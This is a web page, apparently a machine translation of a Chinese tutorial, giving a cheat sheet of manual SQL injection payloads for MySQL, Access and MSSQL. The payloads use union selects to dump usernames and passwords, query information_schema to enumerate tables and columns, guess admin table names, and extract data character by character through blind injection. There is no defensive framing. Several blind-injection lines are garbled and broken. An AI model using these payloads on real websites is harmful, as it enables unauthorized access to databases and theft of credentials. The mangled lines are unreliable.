Home > Others

SQL Manual Injection Tips

Source: Internet
Author: User
Tags mssql
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

MySQL Chapter
1. Built-in functions and variables

    @@datadir,version(),database(),user(),load_file(),outfile()

2. Using Concat (), Group_concat (), CONCAT_WS () stitching query Results
Instance:

    xxx.php?id=1 and 1=2 union select 1,    group_concat(username,0x3a,password),3 from user

3. Querying the table segments and fields using the built-in database
Check the table segment:

    xxx.php?id=1 and 1=2 union select 1,2,table_name from     (select* from information_schema.tables where table_schema=数据库名的hex     order by table_schema limit 0,1)t

Check fields:

    xxx.php?id=1 and 1=2 union select 1,2,column_name from     (select* from information_schema.columns where table_name=表名的hex     and table_schema=数据库名hex值 order by 1 limit 1,1)t

Here can be combined with the next concat splicing function

    xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20)     from (select * from information_schema.columns where table_name=表名的hex     and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1–     [n表示第n条数据]

Access article

Guess table name

    *.asp?id=1 and exists (select * from admin)

Guess Column Name

    *.asp?id=1 and exists (select password from admin)

Order by Query

    *.asp?id=1 order by 3

Union query

    *.asp?id=1 union select 1,password,3 from admin

Cases where the Union is not supported
Determine the length of the content first

    *.asp?idfrom>5

And then one guess

    *.asp?idfrom admin)>97

For example, to determine that the value of ASC (Mid (user,1,1)) is 97, you can determine that the first character of the user is a
OK then continue guessing from the second position

    *.asp?idfrom admin)>97

And so on

MSSQL article
MSSQL injection based on error:
Judging whether it's MSSQL

    'and exists (select * from sysobjects) --

If returned to normal, it is MSSQL, otherwise when the sysobjects does not exist, will be an error.

Guess table name:

    'and exists(select * from admin)--

If it exists, it will return to the normal page, otherwise the error is not present.

SQL Manual Injection Tips

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
manual sql injection tutorial tutorial sql injection manual tips manual manual sql injection step by step sql query optimization tips oracle sql tuning tips sql query tuning tips

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More